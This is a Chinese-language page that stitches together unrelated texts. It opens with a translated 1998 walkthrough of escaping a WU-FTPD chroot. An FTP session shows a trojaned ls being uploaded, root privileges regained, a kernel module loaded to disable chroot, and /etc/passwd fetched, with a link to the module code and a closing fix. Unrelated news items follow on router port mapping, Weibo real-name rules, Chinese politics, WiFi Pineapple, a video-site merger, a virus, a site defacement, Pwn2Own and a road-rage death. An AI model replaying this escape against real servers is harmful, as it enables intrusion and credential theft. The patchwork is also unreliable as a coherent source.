这篇文章是对WU-FTPD设置了CHROOT后,配置出现的问题造成了突破CHROOT限制,并可以访问全部文件系统,我只是看到了这篇文章,感觉思路不错,就把其翻译了出来,由于时间仓促,没有对程序进行测试。这篇文章也是98年发表的文章,所以并不一定对现在最新的系统适用。------------了解思路吗!!!

下面是对WU-FTPD的测试,尽管任何FTP服务程序允许限制各种访问,但在用户目录下使用/bin/ls存在潜在的漏洞。

当我们增加一个新的用户到系统的时候(使用adduser,useradd等),新的用户就变成了他用户目录的属主,如:

drwx------ 2 user users 1024 Jun 21 11:26 /home/user/

问题出在当我们设置FTP服务器为了限制用户访问他们目录权利的时候,现在在我们的模拟系统中的用户home目录下建立一个目录结构:

/etc: 密码,组 . 

/bin: ls, compress, gzip... - 一些可以运行的两进制程序。 

/lib, /usr/lib: 一些需要的库文件。 

/dev: 为了建立连接某些操作系统需要访问的一些设备。

用户不需要改变他们的目录等属性,因为我们限制了他们的许可权利和把所有权归属给超级用户。

问题在于当我们做这个的时候,我们忘记了用户home目录的属主现在是归属于用户的。这样的话他可以改变此目录下的任意文件,下面的情况是很容易找到的:

drwxr-xr-x 6 user users 1024 Jun 21 11:26 /home/user/
drwx--x--x 2 root root 1024 Jun 21 11:26 /home/user/bin/

在这里用户user可以改变在他Home下的bin目录,(如果目录里的内容不归属于此用户,我们不能删除目录下的内容,但并不能阻止我们改名它):

OK,现在的要点在那里?我们可以看看wu.ftpd是怎样内部工作的:

当我们通过FTP(LIST命令)来请求一个目录列表的时候,FTP服务程序执行了/bin/ls,注意,这个ls一般是受限用户下的/bin/ls程序。

我们知道FTP服务程序是以ROOT身份来运行的,当一个用户访问受限制的FTP,服务程序会改变它的euid为用户uid。服务程序使用seteuid()来代替setuid()是为了重新获得超级用户的权利,但使用setuid()来操作是不可能的。

不管怎样,FTP服务程序执行了在chroot()后的用户目录下的/bin/ls,chroot()是改变了处理ROOT目录的方法。在chroot()以后进程只能访问文件系统的一部分,而且不能超越这个限制。

如果用户能修改/bin/ls,接着当我们运行LIST的时候,系统就会运行我们修改过的ls,并且这个程序是以euid等用户uid来执行,但这时uid=0,因为ls能调用setuid(0)并要重新获得超级用户的权利,虽然这时候还是在用户目录的限制状况下。

所以下面描述摆脱chroot()的限制:

就象我们上面刚刚说过,即使我们能执行任意代码,我们也只不过在choroot()后的文件系统里在运行,因为chroot()继承父进程到子进程,因此我们派生一个进程的话我们仍然限制于chroot().

ROOT目录进程处理的所有权在系统内存的进程表中存储着所有进程的信息(这个表只能是超级用户访问),因此我们只有能访问这张表,修改我们的ROOT目录并派生一个继承新ROOT目录的进程,我们就摆脱了chroot()的限制。

另外一个方法(FOR LINUX)是装载一个内核模块来捕获chroot()的系统调用,并修改它的可访问文件系统限制,或者干脆是给内核模块来来访问系统并执行任意代码。

实践:

thx:~# ftp
ftp> o ilm
Connected to ilm.
220 ilm FTP server (Version wu-2.4(4) Wed Oct 15 16:11:18 PDT 1997) ready.
Name (ilm:root): user
331 Password required for user.
Password:
230 User user logged in. Access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

用户连接到了机器并访问了他可以访问的系统,一连接后,FTP服务程序执行了chroot()到用户的home 目录:

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 5
drwxr-xr-x 5 user users 1024 Jun 21 11:26 .
drwxr-xr-x 5 user users 1024 Jun 21 11:26 ..
d--x--x--x 2 root root 1024 Jun 21 11:26 bin
drwxr-xr-x 2 root root 1024 Jun 21 11:26 etc
drwxr-xr-x 2 user users 1024 Jun 21 11:26 home
226 Transfer complete.
ftp> cd ..
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 5
drwxr-xr-x 5 user users 1024 Jun 21 11:26 .
drwxr-xr-x 5 user users 1024 Jun 21 21:26 ..
d--x--x--x 2 root root 1024 Jun 21 11:26 bin
drwxr-xr-x 2 root root 1024 Jun 21 11:26 etc
drwxr-xr-x 2 user users 1024 Jun 21 11:26 home
226 Transfer complete.

用户被受限于他的home目录:

ftp> ls bin/ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
---x--x--x 1 root root 138008 Jun 21 11:26 bin/ls
226 Transfer complete.
ftp> ren bin bin.old
350 File exists, ready for destination name
250 RNTO command successful.
ftp> mkdir bin
257 MKD command successful.
ftp> cd bin
250 CWD command successful.
ftp> put ls
226 Transfer complete.
ftp> put insmod
226 Transfer complete.
ftp> put chr.o
226 Transfer complete.

修改ls两进制程序并上载所需文件

ftp> chmod 555 ls
200 CHMOD command successful.
ftp> chmod 555 insmod
200 CHMOD command successful

改变文件属性,这样可以来执行刚刚上载的文件。

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
UID: 0 EUID: 1002
Cambiando EUID...
UID: 0 EUID: 0
Cargando modulo chroot...
Modulo cargado.
226 Transfer complete.

运行修改过的ls并改变他的euid=0和装载木马模块。

ftp> bye
221 Goodbye.
thx:~#

这时,用户已经装载了内核模块并捕获和使chroot() syscall无效了

thx:~# ftp
ftp> o ilm
Connected to ilm.
220 ilm FTP server (Version wu-2.4(4) Wed Oct 15 16:11:18 PDT 1997) ready.
Name (ilm:root): user
331 Password required for user.
Password:
230 User user logged in. Access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

再次登陆,服务程序chroot()到用户目录,但这次由我们的内核模块进行了控制。

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 1697
drwxr-xr-x 21 root root 1024 Jun 21 11:57 .
drwxr-xr-x 21 root root 1024 Jun 21 11:57 ..
-rw-r--r-- 1 root root 118 Apr 21 11:26 .bash_history
drwxr-xr-x 2 root bin 2048 Jun 21 11:26 bin
drwxr-xr-x 2 root root 1024 Jun 8 11:26 boot
drwxr-xr-x 2 root root 1024 Oct 6 11:26 cdrom
drwxr-xr-x 3 root root 21504 Jun 21 15:26 dev
drwxr-xr-x 14 root root 3072 Jun 21 15:26 etc
drwxr-xr-x 7 root root 1024 Jun 21 19:26 export
drwxr-xr-x 7 root root 1024 Jun 21 19:26 home
dr-xr-xr-x 5 root root 0 Jun 21 14:26 proc
... 
-rw-r--r-- 1 root root 404717 Mar 12 18:06 vmlinuz
226 Transfer complete.

这时我们可以访问整个文件系统了。

ftp> get /etc/passwd
226 Transfer complete.

ftp> bye
221 Goodbye.
thx:~#

这是使用了可装载内核模块,假如你使用了其他修改文件等等的可装载内核模块,我们就可以获得更大的权利。

最好的解决办法是设置正确的目录属性:

ilm:~$ ls -ula /home/user
total 5
drwxr-xr-x 6 root root 1024 Jun 21 11:26 ./
drwxr-xr-x 8 root root 1024 Jun 21 11:26 ../
d--x--x--x 2 root root 1024 Jun 21 11:26 bin/
drwxr-xr-x 2 root root 1024 Jun 21 11:26 etc/
drwxr-xr-x 2 user users 1024 Jun 21 11:26 home/
ilm:~$

更好的办法是使用ProFTPD,因为ProFTPD要比WU-FTPD的安全性好不少。

参考:

1,模块代码下载:http://hispahack.ccc.de/wu-guest.tgz
2,wu-ftpd Resource Center --http://www.landfield.com/wu-ftpd/
3,ProFTPD -- http://www.proftpd.org/
4,原文:http://hispahack.ccc.de/en/mi009en.htm

路由器有功能叫端口映射。

所谓端口映射其实就是:外网都访问路由器的IP地址,但是用不同的端口号。路由器将不同的端口号对应到不同的计算机上。

0x01.jpg 

192.168.0.104对应的是1234端口。

192.168.0.100对应的是1235端口。



那么外网访问:

路由器IP:1234  其实就是 192.168.0.104:1234

路由器IP:1235  其实就是 192.168.0.100:1235



基于这个道理。我们可以修改路由器内的每台电脑远程桌面的端口号,第一台电脑改为1234.第二台电脑改为1235.

修改远程桌面的端口号办法:

修改注册表两个键值:

HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp中“PortNumber”的数值

HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp中“PortNumber”的数值

注意:十进制!!

0x02.jpg 

重启电脑,端口号就会生效。同时记得开启我的电脑属性里的允许远程桌面。

以上操作完成。

访问  路由器IP地址:1234就是远程到192.168.0.104的桌面。

访问  路由器IP地址:1235就是远程到192.168.0.100的桌面。

如果是windows7系统,而且你的网络连接选择的是公用网络,请进入windows防火墙关闭防火墙,或者添加例外。



最后,以上方法不可行的话。解决办法,一个路由器对于一台电脑。即DMZ主机。

设置为DMZ的电脑,就和路由器一样的地位。访问路由器就是访问该电脑。

0x03.jpg 

这样设置的话,不需要修改远程桌面的端口,直接输入路由器IP地址就行。缺点是,只能远程一台电脑的桌面。

今天起,微博不实名只能“围观”



CFP供图

多家微博网站对新用户实名认证给予奖励

根据广东省和北京市的微博管理相关规定, 从3 月16 日起,微博实行实名制。

据了解,新浪、腾讯、搜狐、网易等四大门户网站的微博已经实行新注册用户实名制, 用户需要提交身份证号码、手机号码等信息才能注册成功, 而对于已经注册成功的老用户, 则鼓励用户进行实名认证。逾期未进行实名认证的微博老用户,将不能发言、转发,只能浏览。3 月16 日以后, 尚未进行实名认证的用户仍可随时在网站上通过完成身份信息对比认证, 而后正常使用微博。

不填写真名不能认证

为验证实名认证这一消息,15 日,记者尝试在新浪微博上注册新账号。注册页面显示用户需要填写姓名和身份证号码,记者随意输入了一个姓名, 并修改了自己真实身份证后四位,输入身份证一栏,随即弹出“身份信息验证未被通过,请您激活邮箱”。随后,记者激活邮箱里的注册信息,弹出新浪微博登录页面, 再输入登录名和密码后,成功地发出了一条微博。退出账号再登录之后, 记者还是可以通过“先体验微博,稍后再验证”通道进入微博账户。

搜狐微博对新用户100%进行真实身份信息认证,否则不予注册,而老用户每天登录时都会有弹出窗口,提醒进行实名认证。据悉,目前实行的微博实名制,将采取“前台自愿,后台实名”的方式,即用户注册时必须提供真实的身份证明,而在网页上显示的昵称可以自选。

网易微博相关人士向记者介绍,执行实名制分为两个阶段, 从2 月1 日起,微博新用户注册时如不提交真实身份信息,将无法完成注册。从3 月16 日起,老用户若没有补充完成实名认证, 也无法再发言、转发,只能浏览。据悉,本月起国内提供微博服务的几大网站都上线了微博实名验证系统,该系统与公安部门的身份证系统对接。

实名认证网站有奖励

为防止实名制带来用户损失,几家微博网站推出了对微博实名认证的鼓励措施。据了解,从今年1 月1 日起,新浪微博注册环节加入了身份信息比对功能,包括真实姓名、身份证号码等信息。如果信息比对没有成功,注册后只能浏览,如果要发言则需要重新验证身份。对于老用户,本周新浪微博会推出“微身份”勋章以及大量礼物,对完成身份验证的博主提供增值服务。

新浪方面表示,目前已有60%的新浪微博用户完成了实名注册。新浪CEO 曹国伟上月在财报电话会议上表示,今年下半年,微博将通过广告启动商业化。

而搜狐微博告知所有新用户,提供价值2000 万元的视频包月VIP 卡、金额100万元的手机充值卡作为奖励;网易提供主动认证勋章,赠送特色网易产品等;搜房微博推出“幸运大转盘”活动,所有进行实名注册的用户可参与抽奖,最高奖项是13套热门旅游城市优质房的免费居住权。

金羊网去年已实名注册

有别于北京市, 广东省内的腾讯网、金羊网、大洋网、深圳新闻网、奥一网、嘀咕网和饭否网这7 家开展微博业务的主要网站,在去年12 月22 日就实行了实名注册。作为四大门户网站之一的腾讯,依照广东省微博管理的相关规定,腾讯微博只需对新用户执行实名制,而对以往注册的老用户暂时没有要求。

腾讯公关部相关负责人15 日对记者表示,目前尚未收到新的通知要求,还是按照去年年底颁布的实名制管理办法进行管理,不涉及老用户。由于上市公司的相关规定,腾讯实名制微博用户数量目前尚无法公布。

网民担忧信息被泄露

根据今年1 月中国互联网络信息中心(CNNIC)发布的《第29 次中国互联网络发展状况调查统计报告》,截至2011 年12 月底,中国网民规模突破5 亿,其中微博用户数达到2.5 亿。

易观国际分析师董旭对记者表示,对广告主和微博运营商而言,实名认证一方面提升了平台的媒体价值,实现了从虚拟到真实用户的对接,帮助其提升了营销价值和商业价值。

中山大学传播与设计学院教授展江则对记者指出,许多年轻学生对个人信息被泄露心存恐惧。2011 年年底,国内互联网界就曾多次爆发用户信息泄露事件。目前,各大门户网站对于微博实名制可能带来的负面影响未作回应。


薄熙来 图片来源:人民网薄熙来 图片来源:人民网


张德江 图片来源:人民网张德江 图片来源:人民网


人民网北京3月15日电 (记者 徐冬儿) 据新华社报道,中共中央决定:张德江同志兼任重庆市委委员、常委、书记;薄熙来同志不再兼任重庆市委书记、常委、委员职务。

昨天上午,国务院总理温家宝在与中外记者见面并回答记者提问时,就近期被广泛关注的“王立军事件”表示:“现任重庆市委和市政府必须反思,并认真从王立军事件中吸取教训。”

路透社记者:关于大家很关心的重庆市发生的所谓“王立军事件”。王立军进入美国领事馆以后,中央的有关部门已经进行调查。您本人是怎么看待这个事件的?您觉得这一事件会不会影响中央政府对重庆市政府和市委领导的信任?

温家宝:王立军事件发生以后,引起社会的高度关注,国际社会也十分关注。我可以告诉大家,中央高度重视,立即责成有关部门进行专门调查。目前调查已经取得进展,我们将以事实为依据,以法律为准则,严格依法办理。调查和处理的结果一定会给人民以回答,并且经受住法律和历史的检验。

多年来,重庆市历届政府和广大人民群众,为改革建设事业付出了很大的努力,也取得了明显的成绩。但是现任重庆市委和市政府必须反思,并认真从王立军事件中吸取教训。

我在这里想讲一段话。建国以来,在党和政府的领导下,我国的现代化建设事业取得了巨大的成就,但是我们也走过弯路,有过教训。党的十一届三中全会,特别是中央作出关于正确处理若干历史问题的决议以来,确立了解放思想、实事求是的思想路线和党的基本路线,并且做出了改革开放这一决定中国命运和前途的重大抉择。

历史告诉我们,一切符合人民利益的实践,都要认真吸取历史的经验教训,并且经受住历史和实践的考验。这个道理全国人民懂得。因此,我们对未来抱有信心。

薄熙来简历:

男,汉族,1949年7月生,山西定襄人,1980年10月入党,1968年1月参加工作,中国社会科学院研究生院国际新闻专业毕业,研究生学历,文学硕士。

1968-1972年“文革”中进“学习班”,参加劳动

1972-1978年北京市二轻局五金机修厂工人

1978-1979年北京大学历史系世界史专业本科学习

1979-1982年中国社会科学院研究生院国际新闻专业硕士研究生

1982-1984年中央书记处研究室、中央办公厅干部

1984-1988年辽宁省金县县委副书记、书记,大连市金州区委书记(其间:1985-1988年兼任大连经济技术开发区党委书记、副书记)

1988-1989年辽宁省大连市委常委、宣传部部长

1989-1992年辽宁省大连市委常委、副市长

1992-1993年辽宁省大连市委副书记、代市长

1993-1999年辽宁省大连市委副书记、市长

1999-2000年辽宁省委常委、大连市委书记、市长,省委常委、大连市委书记

2000-2001年辽宁省委副书记、代省长

2001-2004年辽宁省委副书记、省长

2004-2007年商务部部长、党组副书记、书记

2007年- 中央政治局委员,重庆市委委员、常委、书记,商务部部长(至2007年12月)

2007年12月- 中央政治局委员,重庆市委委员、常委、书记

2012年3月- 薄熙来同志不再兼任重庆市委书记、常委、委员职务

第十六届、十七届中央委员,十七届中央政治局委员。

张德江简历:

张德江,男,汉族,1946年11月生,辽宁台安人,1971年1月加入中国共产党,1968年11月参加工作,朝鲜金日成综合大学经济系毕业,大学学历。

现任中共中央政治局委员,国务院副总理、党组成员,国务院安全生产委员会主任。

1968—1970年吉林省汪清县罗子沟公社太平大队知青

1970—1972年吉林省汪清县革委会宣传组干事、机关团支部书记

1972—1975年延边大学朝鲜语系朝鲜语专业学习

1975—1978年延边大学朝鲜语系党总支副书记,校党委常委、革委会副主任

1978—1980年朝鲜金日成综合大学经济系学习,留学生党支部书记

1980—1983年延边大学党委常委、副校长

1983—1985年吉林省延吉市委副书记,延边州委常委兼延吉市委副书记

1985—1986年吉林省延边州委副书记

1986—1990年民政部副部长、党组副书记

1990—1995年吉林省委副书记兼延边州委书记

1995—1998年吉林省委书记、省人大常委会主任

1998—2002年浙江省委书记

2002—2007年中央政治局委员,广东省委书记

2007—2008年中央政治局委员

2008—中央政治局委员,国务院副总理、党组成员,国务院安全生产委员会主任

中共第十四届中央候补委员,十五届、十六届、十七届中央委员,十六届、十七届中央政治局委员。

3月12日 国际报道 在SXSW(South by Southwest)会议上发生了一些有趣的事。我的虚拟专用网络不能使用,更奇怪的是,朋友的笔记本弹出了一个窗口显示一只飞舞的动画猫。



被称作Nyan Cat的这个动画立即引起了我的警觉,因为黑客组织LulzSec至少在一个场合使用过这一动画。我开玩笑地说我们被攻击了,朋友迅速关闭了笔记本。


1.jpg






数分钟后我们发现了黑客达伦·凯奇(Darren Kitchen)。凯奇是Hak5创始人,刚在会议上发表了有关安全的演讲。他在演讲中进行的演示表明,利用专用路由器和一款名为WiFi Pineapple的定制软件可以轻松地窃听不安全的WiFi连接。在演示中,所有在上网的听众都受到了攻击。



经常访问社交媒体但缺乏安全经验的数千名SXSW极易成为凯奇等黑客的攻击目标。凯奇的Galaxy Note智能手机界面列出一个长长的黑莓、iPhone、Android和笔记本清单,这些用户自认为连接到了宾馆或星巴克的WiFi热点,但实际上他们都受到了凯奇的WiFi Pineapple的欺骗。他说,“与会的听众都缺乏安全意识。”



如果愿意,凯奇能够发动任何恶意攻击,例如“中间人攻击”(man-in-the-middle attack),窃取毫不知情的受害者的密码和其他数据。但是,凯奇的目的是教育人们提高安全意识,而非攻击他们,因此他的设备只是用Nyan Cat取代每个网页。



凯奇说,“由于距离我的设备比WiFi路由器更近,用户会首先接收到我的设备的信号。在演示中,半数受众连接到了我的WiFi路由器。”



凯奇的WiFi Pineapple是所谓的“热点蜜罐”(Hot-spot Honeypot),吸引试图连接到WiFi的设备。WiFi Pineapple能伪装成用户的设备在“寻找”的WiFi网络。WiFi Pineapple只适用于没有加密的WiFi网络,对使用WPA加密的WiFi网络不起作用。



凯奇笔记本上的软件的作用与WiFi连接相似,它向用户的设备发送的消息表明“这不是你在寻找的WiFi路由器”,干扰当前的WiFi连接。



问题在于,用户的设备能自动记住过去连接的网络,当网络再次可用时会自动连接网络。解决方案是部署用于认证和加密的应答协议,但移动设备厂商尚未在设备在部署这样的协议,因为这可能需要用户点击数下按钮才能连接到网络。



凯奇以90美元的价格出售WiFi Pineapple,客户主要是政府部门和安全专业人士,帮助客户检测网络的安全性。

优酷土豆宣布将以100%换股方式合并(凤凰网科技配图)

凤凰网科技讯 3月12日下午消息,优酷和土豆共同宣布双方于3月11日签订最终协议,优酷和土豆将以100%换股的方式合并。

根据协议条款,自合并生效日起,土豆所有已发行和流通中的A类普通股和B类普通股将退市,每股兑换成7.177股优酷A类普通股;土豆的美国存托凭证(Tudou ADS)将退市并兑换成1.595股优酷美国存托凭证(Youku ADS)。每股Tudou ADS相当于4股土豆B类普通股,每股Youku ADS相当于18股优酷A类普通股。

合并后,优酷股东及美国存托凭证持有者将拥有新公司约71.5%的股份,土豆股东及美国存托凭证持有者将拥有新公司约28.5%的股份。合并后的新公司将命名为优酷土豆股份有限公司(Youku Tudou Inc.)。优酷的美国存托凭证将继续在纽约证券交易所交易,代码YOKU。

优酷创始人、董事长兼CEO古永锵指出:“我们将开创中国网络视频新纪元。优酷土豆将拥有最庞大的用户群体、最多元化的视频内容、最成熟的视频技术平台和最强大的收入转换能力,并将带给用户最高质量的视频体验。”

土豆创始人、董事长兼CEO王微表示:“优酷和土豆对中国视频行业的发展前景,以及如何为用户提供最佳的视频体验,已经建立了共同的愿景。这次合并将进一步强化我们的行业领先地位。土豆可为新公司带来家喻户晓的品牌、诸多正版影视和用户生成内容、庞大的用户群体,以及移动视频领域的广泛伙伴关系和专业经验。我们相信,优酷土豆可以为广大用户带来最佳的视频浏览、上传和分享体验。我们将与我们的广告商、内容供应商和行业伙伴共同成长。”

“战略合并完成后,土豆将保留其品牌和平台的独立性,帮助加强和完善优酷土豆的视频业务。优酷土豆将会推动中国视频行业的良性发展,对行业结构和经济回报的提升做出积极贡献。”古永锵强调,“本次合作会产生多方面的协同效应,将正版视频内容带给更广泛的用户群体,形成更有效的带宽基础设施管理等等。”

本次战略合并已获得双方公司董事会的批准,但合并完成仍取决于惯例成交条件,包括优酷和土豆双方股东的批准。双方股东在各自董事会的代表已承诺支持本次合并。本次合并预计在2012年第三季度完成。

 几家反病毒公司同时收到了一种名为“Sharpei”的新型病毒复本,这种病毒基于微软最新型的计算机语言C#编写,它设计用于感染那些装有.Net系统的计算机。反病毒公司Network Associates认为该病毒的危险程度仅为“低级”,但表示这已是第二种试图对.Net系统产生危害的新型病毒。



Network Associates公司反病毒紧急事故应因小组的负责人文森特-古罗特表示:“即便不使用C#语言,这种病毒也能工作,它试图对.Net进行攻击。”



今年1月份,名为“Donut”的病毒就曾经试图对.Net的部分架构进行攻击,但微软后来否认这是一种.Net病毒。至于“Sharpei”的出现,微软还没有对此发表评论。



反病毒专家称,“Sharpei”尚未对计算机用户造成负面影响,但一旦它得到传播就会影响到大多数计算机,因为它是一种以电子邮件形式传播的病毒,其主 题为“重要信息:视窗升级”,其附带的文本内容为:“这一升级版本可以使视窗系统运行速度增快50%,而且更加安全。我想您一定会喜欢。”



等到用户打开附带信息后,这种病毒就会利用Outlook地址簿发送带有病毒的信息,随后它还可以将已发送的电子邮件从邮件夹中删除并删掉自身的复本。对 于装有视窗XP操作系统以及其他.Net软件的计算机而言,“Sharpei”病毒还会感染另外4种文档中的文件,如果这些文件正好处于打开状态,那么这种病毒就会启动。



据悉,这种病毒是一名17岁的荷兰女孩子用C#语言编写的,“据我们所知,她是荷兰唯一写病毒的女孩子。”反病毒公司AVERT这样介绍。

1.JPG


当天在微博看到此截图我还以为是PS的,没去理会.



前日晚,微博中有消息称教育部门户网站被黑,页面被黑客篡改。而微博认证资料为信息安全资深人士的陈诚提供了截图。在截图中显示,黑客在篡改的网页上留下了自己的姓名、居住城市和QQ号。但这位QQ号拥有者却大呼冤枉,声称被人暗算了。

教育部网站被黑

挂上入侵者身份信息

前日晚9时30分,教育部门户网站http://www.moe.edu.cn/打开后并没有出现应有的界面,而是出现一张恍如白屏的页面。在这张白屏页面上,只有短短的几句带有语法错误的英文:“Hello i'm helen.I from Nanchang.hacker is Me.Hacked by:Helen QQ:305536XXX”,在这短短文字里,提供了4条信息:1、他的名字是“Helen”;2、他就是黑客 3、他是南昌人 4、他的QQ号是305536xxx。

而在前日晚9时41分,微博认证资料为信息安全资深人士的陈诚(网名为“冷漠”),马上证实了这一消息,不但在微博中发出了“教育部网站被黑”的微博,还在微博中附上了被篡改网页的截图。上海上讯信息技术有限公司安全咨询事业部官方微博也证实了教育部网站被“黑”之事。

当事人大呼冤枉:

可能江湖恩怨惹来报复

但是很快,QQ号305536xxx的主人“helen”于深夜在微博上发表声明:“跟我一点关系都没有,那是别人陷害的,事不关己,高高挂起!”而“helen”同时表示:“黑客一定逃不脱法律的制裁,触犯法律底线的人,最终都会走向看守所的大门。”昨日,“helen”将QQ签名更改为:“侥幸的心理,就是犯罪的开始!打击网络犯罪,是每个网民应尽的责任!”记者在“helen”的微博上看到,“helen”可能与黑客打过交道,其曾这样写道:“不是黑客精神消失了,而是我们的信仰模糊了。”

昨日,成都晚报记者通过QQ联系上了“helen”。“helen”告诉记者,对于此事的情况他也不是很了解,因为事发时他因感冒正在休息。但“helen”也直言,他的职业确实是关于计算机网络的,不过,他是“网络安全从业者”,也就是专门维护服务器安全的工作人员,而不是黑客。

“可能是一些私人恩怨,有人在报复我。”“helen”称,在加入工作的“技术圈”后,他得罪过不少人,所以怀疑有人为了报复他,才去“黑”了教育部的网站,并把他的资料挂在网站上。“helen”称,他希望有关部门能尽快介入破案,还他一个清白,同时也将肇事者绳之以法。

昨日下午3时,记者点击教育部网站,发现已经恢复原貌,能够正常进入。

3月9日消息,据国外媒体报道,谷歌在CanSecWest信息安全大会上拿出100万美元作为奖赏能够攻破Chrome浏览器的黑客。而在谷歌发布这一消息的十天之后,就有黑客成功将Chrome浏览器攻破。

据报道,目前一位名叫Sergey Glazunov的俄罗斯学生发现了该系统中的漏洞,他利用该漏洞攻破了Chrome的“沙盒”(Sandbox)从而最终将Chrome浏览器攻破并赢得了60000美元的奖金,这使得他可以控制Windows 7系统。 

据报道,负责Chrome和谷歌软件的高级副总经理Sundar Pichai在其公司博客上称,“我们热烈祝贺贡献者Sergey Glazunov成为第一个攻破Chrome的人,他不仅充分利用了该软件的缺憾成功攻破了Chrome 浏览器,而且他确实也符合赢取6万美元奖励的条件。”“我们目前正致力于找到修复这一漏洞的方法,然后我们就可以对Chrome进行自动更新,这实在是一个令人激动的消息。我们今年组织的这次比赛是为了鼓励人们向我们提交他们发现的漏洞从而使网络浏览变得更加安全。我们非常期待其他任何可以使Chrome变得更加安全的发现。” 

同时,在Pwn2Own黑客大赛上,Chrome除此之外还被攻破过一次。事实上,Vupen安全公司的研究人员在比赛的前五分钟内就攻破了Chrome。他们说他们在IE浏览器、Safari和Firefox浏览器中都发现了同样的漏洞。 

自从该黑客大赛奖励项目于去年11月份开办以来,谷歌已经在鼓励黑客发现Chrome故障问题上拿出了410000美元作为奖励。然而最近黑客的发现夺走了Chrome“难以攻克”的美誉,谷歌公司却称他们对此结果表示非常高兴。 

谷歌公司的技术项目总经理Adam Mein称,“由于这一举动使得Chrome在以后会变得更好、更壮大。我们找到越多的漏洞问题,就表示我们能够找到越多的修复方法,这就意味着我们用户将会有一个更为安全的网络环境。”

2012年03月4日早上,北京市海淀区田村北路与砂石厂路交叉口,行人孙先生与一辆银色道奇公羊越野车车主发生口角,随后被该越野车碾轧身亡。目前,该案已移交刑警,肇事车主已被拘留。

事件回顾

孙先生的妻子傅女士称,4日早上9点多,她与丈夫走在东西方向的田村北路上,行至该路与南北方向的砂石厂路的交叉口时,被一辆准备从田村北路拐进砂石厂路的银色轿车剐碰,孙先生与该车女司机发生口角。


    随后,银色轿车后的一辆越野车的男司机下车,上前与孙先生夫妻争吵。吵完之后,女司机上车,将车开走。男司机上车之后,则把车对着孙先生开过来,将孙先生撞倒在地。


    越野车并未停车,而是倒车调整方位,又对着倒地的孙先生撞过来。车轧过孙先生后,撞到砂石厂路西侧的墙边才停下。


    此时,孙先生上半身已处在越野车下,双腿露在车外。之后,急救人员到场,发现孙先生已身亡。